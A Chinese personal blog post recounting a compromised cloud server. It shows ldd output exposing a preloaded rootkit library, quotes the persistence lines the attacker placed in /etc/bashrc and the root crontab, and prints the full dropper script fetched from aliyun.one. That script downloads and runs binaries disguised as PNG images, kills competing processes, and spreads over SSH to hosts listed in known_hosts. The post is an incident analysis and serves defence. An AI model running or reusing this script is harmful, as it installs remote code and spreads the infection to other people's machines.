Posts Moments Tools About

刚买的腾讯云服务器，因为临时测试下性能，所以只是设置了一个简单的密码，结果分分钟就被爆破了。

登录上服务器，发现 CPU 负载很高，但用 top 命令却无法找到是哪个进程在占用 CPU。 参考了 这篇文章 ， 使用 ldd 查看 top，ps 以及 vmstat 的动态链接库，发现均有同一个可疑的 /usr/local/lib/libevent_core-0.12.so :

# ldd  `which top`
linux-vdso.so.1 =>  (0x00007ffe21bc7000)
/usr/local/lib/libevent_core-0.12.so (0x00007ff594420000)
libprocps.so.4 => /lib64/libprocps.so.4 (0x00007ff5941f9000)
libsystemd.so.0 => /lib64/libsystemd.so.0 (0x00007ff593fc8000)
libncurses.so.5 => /lib64/libncurses.so.5 (0x00007ff593da1000)
libtinfo.so.5 => /lib64/libtinfo.so.5 (0x00007ff593b77000)
libdl.so.2 => /lib64/libdl.so.2 (0x00007ff593973000)
libc.so.6 => /lib64/libc.so.6 (0x00007ff5935a5000)
libcap.so.2 => /lib64/libcap.so.2 (0x00007ff5933a0000)
libm.so.6 => /lib64/libm.so.6 (0x00007ff59309e000)
librt.so.1 => /lib64/librt.so.1 (0x00007ff592e96000)
libselinux.so.1 => /lib64/libselinux.so.1 (0x00007ff592c6f000)
liblzma.so.5 => /lib64/liblzma.so.5 (0x00007ff592a49000)
liblz4.so.1 => /lib64/liblz4.so.1 (0x00007ff592834000)
libgcrypt.so.11 => /lib64/libgcrypt.so.11 (0x00007ff5925b3000)
libgpg-error.so.0 => /lib64/libgpg-error.so.0 (0x00007ff5923ae000)
libresolv.so.2 => /lib64/libresolv.so.2 (0x00007ff592195000)
libdw.so.1 => /lib64/libdw.so.1 (0x00007ff591f44000)
libgcc_s.so.1 => /lib64/libgcc_s.so.1 (0x00007ff591d2e000)
libpthread.so.0 => /lib64/libpthread.so.0 (0x00007ff591b12000)
/lib64/ld-linux-x86-64.so.2 (0x00007ff594626000)
libattr.so.1 => /lib64/libattr.so.1 (0x00007ff59190d000)
libpcre.so.1 => /lib64/libpcre.so.1 (0x00007ff5916ab000)
libelf.so.1 => /lib64/libelf.so.1 (0x00007ff591493000)
libz.so.1 => /lib64/libz.so.1 (0x00007ff59127d000)
libbz2.so.1 => /lib64/libbz2.so.1 (0x00007ff59106d000)


# ldd `which ps`
linux-vdso.so.1 =>  (0x00007ffe8214a000)
/usr/local/lib/libevent_core-0.12.so (0x00007f49ddc38000)
libprocps.so.4 => /lib64/libprocps.so.4 (0x00007f49dda11000)
libsystemd.so.0 => /lib64/libsystemd.so.0 (0x00007f49dd7e0000)
libdl.so.2 => /lib64/libdl.so.2 (0x00007f49dd5dc000)
libc.so.6 => /lib64/libc.so.6 (0x00007f49dd20e000)
libcap.so.2 => /lib64/libcap.so.2 (0x00007f49dd009000)
libm.so.6 => /lib64/libm.so.6 (0x00007f49dcd07000)
librt.so.1 => /lib64/librt.so.1 (0x00007f49dcaff000)
libselinux.so.1 => /lib64/libselinux.so.1 (0x00007f49dc8d8000)
liblzma.so.5 => /lib64/liblzma.so.5 (0x00007f49dc6b2000)
liblz4.so.1 => /lib64/liblz4.so.1 (0x00007f49dc49d000)
libgcrypt.so.11 => /lib64/libgcrypt.so.11 (0x00007f49dc21c000)
libgpg-error.so.0 => /lib64/libgpg-error.so.0 (0x00007f49dc017000)
libresolv.so.2 => /lib64/libresolv.so.2 (0x00007f49dbdfe000)
libdw.so.1 => /lib64/libdw.so.1 (0x00007f49dbbad000)
libgcc_s.so.1 => /lib64/libgcc_s.so.1 (0x00007f49db997000)
libpthread.so.0 => /lib64/libpthread.so.0 (0x00007f49db77b000)
/lib64/ld-linux-x86-64.so.2 (0x00007f49dde3e000)
libattr.so.1 => /lib64/libattr.so.1 (0x00007f49db576000)
libpcre.so.1 => /lib64/libpcre.so.1 (0x00007f49db314000)
libelf.so.1 => /lib64/libelf.so.1 (0x00007f49db0fc000)
libz.so.1 => /lib64/libz.so.1 (0x00007f49daee6000)
libbz2.so.1 => /lib64/libbz2.so.1 (0x00007f49dacd6000)


# ldd `which vmstat`
linux-vdso.so.1 =>  (0x00007ffd99ce3000)
/usr/local/lib/libevent_core-0.12.so (0x00007fdf0f4cb000)
libprocps.so.4 => /lib64/libprocps.so.4 (0x00007fdf0f2a4000)
libsystemd.so.0 => /lib64/libsystemd.so.0 (0x00007fdf0f073000)
libdl.so.2 => /lib64/libdl.so.2 (0x00007fdf0ee6f000)
libc.so.6 => /lib64/libc.so.6 (0x00007fdf0eaa1000)
libcap.so.2 => /lib64/libcap.so.2 (0x00007fdf0e89c000)
libm.so.6 => /lib64/libm.so.6 (0x00007fdf0e59a000)
librt.so.1 => /lib64/librt.so.1 (0x00007fdf0e392000)
libselinux.so.1 => /lib64/libselinux.so.1 (0x00007fdf0e16b000)
liblzma.so.5 => /lib64/liblzma.so.5 (0x00007fdf0df45000)
liblz4.so.1 => /lib64/liblz4.so.1 (0x00007fdf0dd30000)
libgcrypt.so.11 => /lib64/libgcrypt.so.11 (0x00007fdf0daaf000)
libgpg-error.so.0 => /lib64/libgpg-error.so.0 (0x00007fdf0d8aa000)
libresolv.so.2 => /lib64/libresolv.so.2 (0x00007fdf0d691000)
libdw.so.1 => /lib64/libdw.so.1 (0x00007fdf0d440000)
libgcc_s.so.1 => /lib64/libgcc_s.so.1 (0x00007fdf0d22a000)
libpthread.so.0 => /lib64/libpthread.so.0 (0x00007fdf0d00e000)
/lib64/ld-linux-x86-64.so.2 (0x00007fdf0f6d1000)
libattr.so.1 => /lib64/libattr.so.1 (0x00007fdf0ce09000)
libpcre.so.1 => /lib64/libpcre.so.1 (0x00007fdf0cba7000)
libelf.so.1 => /lib64/libelf.so.1 (0x00007fdf0c98f000)
libz.so.1 => /lib64/libz.so.1 (0x00007fdf0c779000)
libbz2.so.1 => /lib64/libbz2.so.1 (0x00007fdf0c569000)

之后又找到了 另一篇文章 ， 发现它描述的入侵案例和我遇到的一模一样，相关文件如下:

在 /etc/bashrc 中:

(curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;exec(urllib.urlopen("http://aliyun.one/pygo").read())')|sh >/dev/null 2>&1 &

在 /var/spool/cron/root 中:

*/15 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen("http://aliyun.one").read())')|sh

上面两个文件都被攻击者插入了恶意代码，目的是获取如下脚本并经由 shell 执行:

#<script>window.location.href="http://aliyun.com";</script><!--
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
mv /bin/wge /bin/wget
mv /bin/cur /bin/curl
mv /usr/bin/wge /usr/bin/wget
mv /usr/bin/cur /usr/bin/curl
mkdir -p /tmp
chmod 1777 /tmp
echo "*/10 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen(\"http://aliyun.one\").read())')|sh"|crontab -
cat > /etc/crontab <<EOF
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin

*/10 * * * * root (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen("http://aliyun.one").read())'||/usr/local/sbin/76572670a3)|sh
EOF
swapoff -a
find /etc/cron*|xargs chattr -i
find /var/spool/cron*|xargs chattr -i
grep -RE "(wget|curl)" /etc/cron*|grep -v "aliyun.one"|cut -f 1 -d :|xargs rm -rf
grep -RE "(wget|curl)" /var/spool/cron*|grep -v "aliyun.one"|cut -f 1 -d :|xargs rm -rf
netstat -anp|grep :::6345|awk '{print $7}'|sed -e "s/\/.*//g"|xargs kill -9
netstat -anp|grep 119.9.76.107:443|awk '{print $7}'|sed -e "s/\/.*//g"|xargs kill -9
cd /tmp
touch /usr/local/bin/writeablex && cd /usr/local/bin/
touch /usr/libexec/writeablex && cd /usr/libexec/
touch /usr/bin/writeablex && cd /usr/bin/
rm -rf /usr/local/bin/writeablex /usr/libexec/writeablex /usr/bin/writeablex

export PATH=$PATH:$(pwd)
a64="img.sobot.com/chatres/89/msg/20191225/1/ec0991da601e45c4b0bb6178da5f0cc4.png"
a32="img.sobot.com/chatres/89/msg/20191225/1/50659157a100466a88fed550423a38ee.png"
b64="cdn.xiaoduoai.com/cvd/dist/fileUpload/1577269944760/2.637890910155951.png"
b32="cdn.xiaoduoai.com/cvd/dist/fileUpload/1577269966297/8.872362655092918.png"
c64="https://user-images.githubusercontent.com/56861392/71443284-08acf200-2745-11ea-8ef3-509d9072d970.png"
c32="https://user-images.githubusercontent.com/56861392/71443285-08acf200-2745-11ea-96c3-0c2be9135085.png"
if [ ! -f "76572670a3" ]; then
    ARCH=$(getconf LONG_BIT)
    if [ ${ARCH}x = "64x" ]; then
        (curl -fsSL -m180 $a64 -o 76572670a3||wget -T180 -q $a64 -O 76572670a3||python -c 'import urllib;urllib.urlretrieve("http://'$a64'", "76572670a3")'||curl -fsSL -m180 $b64 -o 76572670a3||wget -T180 -q $b64 -O 76572670a3||python -c 'import urllib;urllib.urlretrieve("http://'$b64'", "76572670a3")'||curl -fsSL -m180 $c64 -o 76572670a3||wget -T180 -q $c64 -O 76572670a3||python -c 'import urllib;urllib.urlretrieve("'$c64'", "76572670a3")')
    else
        (curl -fsSL -m180 $a32 -o 76572670a3||wget -T180 -q $a32 -O 76572670a3||python -c 'import urllib;urllib.urlretrieve("http://'$a32'", "76572670a3")'||curl -fsSL -m180 $b32 -o 76572670a3||wget -T180 -q $b32 -O 76572670a3||python -c 'import urllib;urllib.urlretrieve("http://'$b32'", "76572670a3")'||curl -fsSL -m180 $c32 -o 76572670a3||wget -T180 -q $c32 -O 76572670a3||python -c 'import urllib;urllib.urlretrieve("'$c32'", "76572670a3")')
    fi
fi
chmod +x 76572670a3
$(pwd)/76572670a3 || ./76572670a3 || /usr/bin/76572670a3 || /usr/libexec/76572670a3 || /usr/local/bin/76572670a3 || 76572670a3 || /tmp/76572670a3 || /usr/local/sbin/76572670a3
if [ -f /root/.ssh/known_hosts ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL aliyun.one||wget -q -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen(\"http://aliyun.one\").read())')|sh >/dev/null 2>&1 &";done
fi

for file in /home/*
do
    if test -d $file; then
        if [ -f $file/.ssh/known_hosts ]; then
            for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL aliyun.one||wget -q -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen(\"http://aliyun.one\").read())')|sh >/dev/null 2>&1 &";done
        fi
    fi
done
#-->

更可恶的是，这个脚本会扫描本地 .ssh/known_hosts 文件，继续传播恶意代码！

Thanks for reading :)

References

• https://www.anquanke.com/post/id/171523

• https://zhuanlan.zhihu.com/p/65609044

CC BY-NC-SA 2018-2023 an9wer | powered by docutils